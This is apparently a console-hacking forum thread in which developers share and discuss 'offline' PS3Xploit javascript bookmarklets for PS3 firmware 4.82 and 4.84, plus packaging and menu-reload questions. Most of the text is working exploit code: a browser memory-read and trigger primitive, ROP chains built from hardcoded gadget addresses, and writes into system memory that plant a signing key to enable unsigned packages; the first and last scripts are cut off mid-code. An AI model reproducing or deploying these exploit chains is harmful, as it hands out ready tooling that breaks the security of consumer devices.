d\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var b=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var c=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var d=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((c===jump_2)&&(d===jump_1)&&(x===xtra_data)&&(b===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){debug=true;debug=false}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(showTemps,2000);t_out=0;total_loops=0}initROP(true);';eval(temp);
Pretty cool that we can use these scripts on OFW, very useful
By the way, if you use these scripts, please leave the credits. I obviously did not write the base scripts and I acknowledge that, but I did spend hours carefully removing functions to allow offline use. Thanks.
Working nicely here. Will be added in next toolbox update.
To be sure : it's CEX 4.82 only, like your others ? I need to add this info too.
esc0rtd3w
Developer
All of my offline scripts will only work on 4.82 CEX unless I state otherwise in the posts, just not really a point in backwards compatibility when it comes to this stuff IMO
I created a pkg file for all offline HAN javascript that lmn7 created so far.
I used hantoolbox as a template so thanks to shaolinassasin for this.
I also re-arrange the the entry as well with the Offline HAN enable as the first entry, offline Debug pkg enabler as 2nd, Offline Temperature check as 3rd and last is the Offline restart ps3 (so no one can accidentally choose this option, yes theres already countless times I accidentally restart my ps3 cause im stupid).
I used hantoolbox as a template so thanks to shaolinassasin for this.
I also re-arrange the the entry as well with the Offline HAN enable as the first entry, offline Debug pkg enabler as 2nd, Offline Temperature check as 3rd and last is the Offline restart ps3 (so no one can accidentally choose this option, yes theres already countless times I accidentally restart my ps3 cause im stupid).
ShaolinAssassin
Developer
There is a typo : it's temperature, not "temperarute" (in "Check CPU and RSX temperarute"). Also, in the info strings, no need to mention that they are scripts for CEX - because if DEX users install this version, they won't see anything. But maybe your should mention instead that they are 4.82 tools only.
There is a typo : it's temperature, not "temperarute" (in "Check CPU and RSX temperarute"). Also, in the info strings, no need to mention that they are scripts for CEX - because if DEX users install this version, they won't see anything. But maybe your should mention instead that they are 4.82 tools only.
yeah didnt see that typo, but well we get the idea anyway.
and yeah its cex only.
in1975
Member
As everyone knows, after installing the list of * .pkg files, you have to either reboot or change the user to see the changed xmb menu. I wondered how to fix this situation. While I found one thing: add a user shift to the toolbox:
Maybe there is a more elegant solution? I watched the documentation: https://www.psdevwiki.com/ps3/Explore_plugin there:
Just do not quite understand the syntax...
Code:
<Query
class="type:x-xmb/folder-pixmap"
key="user_provider_1"
src="user://localhost/users"
/>Maybe there is a more elegant solution? I watched the documentation: https://www.psdevwiki.com/ps3/Explore_plugin there:
| reload_category_items game |
Just do not quite understand the syntax...
ShaolinAssassin
Developer
I was wondering the same and came to this - IMO - bad solution...
in1975
Member
that's why I started this conversation.
There is this in the file category_game.xml:
Code:
<Query
class="type:x-xmb/folder-pixmap"
key="seg_gameexit"
src="sel://localhost/ingame?path=category_game.xml#seg_gameexit&type=game"
/>
...
<View id="seg_gameexit">
<Items>
<Item class="type:x-xmb/xmlgameexit" key="gameexit" />
</Items>
</View>I tried several options, nothing yet.
Last edited:
The reload_category syntax looks correct, I just don't know how you would call it properly as I haven't done much with xml files. It's a good thought though, you get errors if you install a pkg through PKG linker and then try to install a second one because the XMB hasn't refreshed.
in1975
Member
To study * .xml files, you can unpack the OFW firmware using this. Put the PS3UPDAT.PUP file and run UNPACK.bat
The xml files will be on the path: .\Part4_enc\dev_flash\vsh\resource\explore\ xmb and other.
The xml files will be on the path: .\Part4_enc\dev_flash\vsh\resource\explore\ xmb and other.
To anyone on the newly released 4.84 hybrid firmware, here are all of my offline scripts updated with 4.84 offsets. If you have the time, please test them and report the results:
HAN:
Debug PKG:
Show temps:
Reboot:
File copier (works on 4.84 only due to size):
Rebuild database (new):
All scripts excluding the file copier will work on both 4.82 & 4.84 CEX. Some have been tested and some have not. Let me know if there's any issues.
HAN:
Code:
javascript:eval('var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,debug=!1,ps3xploit_ecdsa_key="948DA13E8CAFD5BA0E90CE434461BB327FE7E080475EAA0AD3AD4F5B6247A7FDA86DF69790196773",index_key="DA7D4B5E499A4F53B1C1A14A7484443B",start_x="xxxx",offset_array=[],t_out=0,ps3xploit_ecdsa_key_addr=0,index_key_addr=0,search_max_threshold=73400320,search_base=2148532224,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=2365587456,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,toc_addr=7296336,default_vsh_pub_toc=7263652,vsh_opd_patch=617820,vsh_opd_addr=7256936,vsh_ps3xploit_key_toc=7370612,toc_entry1_addr=7185360,toc_entry2_addr=7494200,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255744,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332484,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380604,gadget7_addr=131024,gadget8_addr=131072,gadget_mod1_addr=6352696,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,hr="\74hr\76",ua=navigator.userAgent,fwv=ua.substring(ua.indexOf("5.0 (")+19,ua.indexOf(") Apple"));document.write(\47\74html\76\74head\76\74title\76PS3Xploit - Offline HAN Enabler 4.82/4.84 by lmn7 @ psx-place.com\74/title\76\74/head\76\74body id="bodyId" style="background-color:#FFFFFF"\76\74div id="headerId"\76\74h1\76Enabling HAN...\74/h1\76\74span id="hideme" style="visibility:hidden"\76\74p\76\74button id="btnROP" type="button" onclick="initROP(true);" autofocus\76Initialize\74/button\76 | Close \74input type="checkbox" id="auto_close" name="aclose" checked="checked" onclick="autoclose();"/\76\74span id="dex_txt" style="visibility:hidden"\76\74input type="checkbox" id="dex" name="DEX" disabled="" onclick="dex();"/\76\74/span\76\74/p\76\74p\76\74button id="btnTrigger" disabled="" type="button" onclick="triggerX();"\76En\74/button\76\74span id="reset" style="visibility:hidden"\76 | \74button id="btnReset" type="button" onclick="disable_trigger();"\76Reset\74/button\76\74/span\76\74/p\76\74/span\76\74div id="exploit" \76\74/div\76\74div id="trigger"\76\74/div\76\74/body\76\74/html\76\47);if(fwv=="4.84"){var toc_addr=7296344,default_vsh_pub_toc=7263660,vsh_opd_patch=617820,vsh_opd_addr=7256944,vsh_toc_addr_screenshot=7472764,vsh_ps3xploit_key_toc=7370860,toc_entry1_addr=7185360,toc_entry2_addr=7494456,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255752,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332644,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380764,gadget7_addr=131024,gadget8_addr=131072,gadget9_addr=170760,gadget10_addr=6479908,gadget11_addr=5874864,gadget12_addr=820812,gadget13_addr=4777384,gadget14_addr=4769696,gadget15_addr=4758664,gadget_mod1_addr=6352856,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod4b_addr=4376440,gadget_mod4c_addr=346864,gadget_mod5_addr=4339932,gadget_mod6_addr=134144,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,gadget_mod9_addr=68384,gadget_mod10_addr=1857428,gadget_mod11_addr=1618244,gadget_mod12_addr=6500860,gadget_mod13_addr=3369072,gadget_mod14_addr=6502656,gadget_mod15_addr=3788856,gadget_mod16_addr=5206828}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);if(debug===true){var x=document.getElementById(\47exploit\47).style.src.substr(6,c);return x}return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function rop_exit(a){var b=document.getElementById(\47auto_close\47);if(b){if(b.checked===true)window.close()}}function load_check(){if(total_loops\74max_loops){t_out=setTimeout(initROP,1000,false)}else{total_loops=0;t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function memcpy(a,b,c){return callsub(gadget8_addr,a,b,c,0,0,0,0,0,0,0x70)}function store_word(a,b,c,d,e){if(c===null){c=gtemp_addr}if(d===null){d=gtemp_addr}if(e===null){e=gtemp_addr}return hexdw2bin(gadget_mod3_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(b)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(a-0xC74)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod7_addr)+fill_by_16bytes(0x70,dbyte41)+hexdw2bin(c)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initDefaults(){offset_array=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;ps3xploit_ecdsa_key_addr=0;index_key_addr=0;search_max_threshold=70*0x100000;search_base=0x80100000;search_size=2*mbytes;search_size_ext=0*mbytes;search_base_off=0*mbytes;total_loops++}function initROP(a){try{if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}initDefaults();xtra_data=start_x.convert()+ps3xploit_ecdsa_key.convert(true)+index_key.convert(true)+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}ps3xploit_ecdsa_key_addr=xtra_data_addr+start_x.convertedSize()-0x4;index_key_addr=ps3xploit_ecdsa_key_addr+ps3xploit_ecdsa_key.convertedSize(true);stack_frame=stack_frame_hookup()+store_word(toc_entry1_addr,vsh_opd_patch+4)+store_word(toc_entry3_addr,vsh_opd_patch+4)+store_word(toc_entry5_addr,vsh_opd_patch+4)+store_word(default_vsh_pub_toc,vsh_ps3xploit_key_toc)+memcpy(vsh_ps3xploit_key_toc-0x20,index_key_addr,(index_key.length/2))+memcpy(vsh_ps3xploit_key_toc,ps3xploit_ecdsa_key_addr,(ps3xploit_ecdsa_key.length/2))+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var b=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var c=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var d=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((c===jump_2)&&(d===jump_1)&&(x===xtra_data)&&(b===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){debug=true;debug=false}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(rop_exit,2000,hr);setTimeout(window.close,2000);t_out=0;total_loops=0}initROP(true);');Debug PKG:
Code:
javascript:eval('var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,debug=!1,ps3xploit_ecdsa_key="948DA13E8CAFD5BA0E90CE434461BB327FE7E080475EAA0AD3AD4F5B6247A7FDA86DF69790196773",index_key="DA7D4B5E499A4F53B1C1A14A7484443B",start_x="xxxx",offset_array=[],t_out=0,ps3xploit_ecdsa_key_addr=0,index_key_addr=0,search_max_threshold=73400320,search_base=2148532224,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=2365587456,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,toc_addr=7296336,default_vsh_pub_toc=7263652,vsh_opd_patch=617820,vsh_opd_addr=7256936,vsh_ps3xploit_key_toc=7370612,toc_entry1_addr=7185360,toc_entry2_addr=7494200,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255744,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332484,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380604,gadget7_addr=131024,gadget8_addr=131072,gadget_mod1_addr=6352696,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,hr="\74hr\76",ua=navigator.userAgent,fwv=ua.substring(ua.indexOf("5.0 (")+19,ua.indexOf(") Apple"));document.write(\47\74html\76\74head\76\74title\76PS3Xploit - Offline Debug Package Enabler by lmn7\74/title\76\74/head\76\74body id="bodyId" style="background-color:#FFFFFF"\76\74div id="headerId"\76\74h1\76Enabling Debug Packages...\74/h1\76\74span id="hideme" style="visibility:hidden"\76\74p\76\74button id="btnROP" type="button" onclick="initROP(true);" autofocus\76Initialize\74/button\76 | Close \74input type="checkbox" id="auto_close" name="aclose" checked="checked" onclick="autoclose();"/\76\74span id="dex_txt" style="visibility:hidden"\76\74input type="checkbox" id="dex" name="DEX" disabled="" onclick="dex();"/\76\74/span\76\74/p\76\74p\76\74button id="btnTrigger" disabled="" type="button" onclick="triggerX();"\76En\74/button\76\74span id="reset" style="visibility:hidden"\76 | \74button id="btnReset" type="button" onclick="disable_trigger();"\76Reset\74/button\76\74/span\76\74/p\76\74/span\76\74div id="exploit" \76\74/div\76\74div id="trigger"\76\74/div\76\74/body\76\74/html\76\47);if(fwv=="4.84"){var toc_addr=7296344,default_vsh_pub_toc=7263660,vsh_opd_patch=617820,vsh_opd_addr=7256944,vsh_toc_addr_screenshot=7472764,vsh_ps3xploit_key_toc=7370860,toc_entry1_addr=7185360,toc_entry2_addr=7494456,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255752,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332644,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380764,gadget7_addr=131024,gadget8_addr=131072,gadget9_addr=170760,gadget10_addr=6479908,gadget11_addr=5874864,gadget12_addr=820812,gadget13_addr=4777384,gadget14_addr=4769696,gadget15_addr=4758664,gadget_mod1_addr=6352856,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod4b_addr=4376440,gadget_mod4c_addr=346864,gadget_mod5_addr=4339932,gadget_mod6_addr=134144,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,gadget_mod9_addr=68384,gadget_mod10_addr=1857428,gadget_mod11_addr=1618244,gadget_mod12_addr=6500860,gadget_mod13_addr=3369072,gadget_mod14_addr=6502656,gadget_mod15_addr=3788856,gadget_mod16_addr=5206828}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);if(debug===true){var x=document.getElementById(\47exploit\47).style.src.substr(6,c);return x}return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function rop_exit(a){var b=document.getElementById(\47auto_close\47);if(b){if(b.checked===true)window.close()}}function load_check(){if(total_loops\74max_loops){t_out=setTimeout(initROP,1000,false)}else{total_loops=0;t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function memcpy(a,b,c){return callsub(gadget8_addr,a,b,c,0,0,0,0,0,0,0x70)}function store_word(a,b,c,d,e){if(c===null){c=gtemp_addr}if(d===null){d=gtemp_addr}if(e===null){e=gtemp_addr}return hexdw2bin(gadget_mod3_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(b)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(a-0xC74)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod7_addr)+fill_by_16bytes(0x70,dbyte41)+hexdw2bin(c)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initDefaults(){offset_array=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;ps3xploit_ecdsa_key_addr=0;index_key_addr=0;search_max_threshold=70*0x100000;search_base=0x80100000;search_size=2*mbytes;search_size_ext=0*mbytes;search_base_off=0*mbytes;total_loops++}function 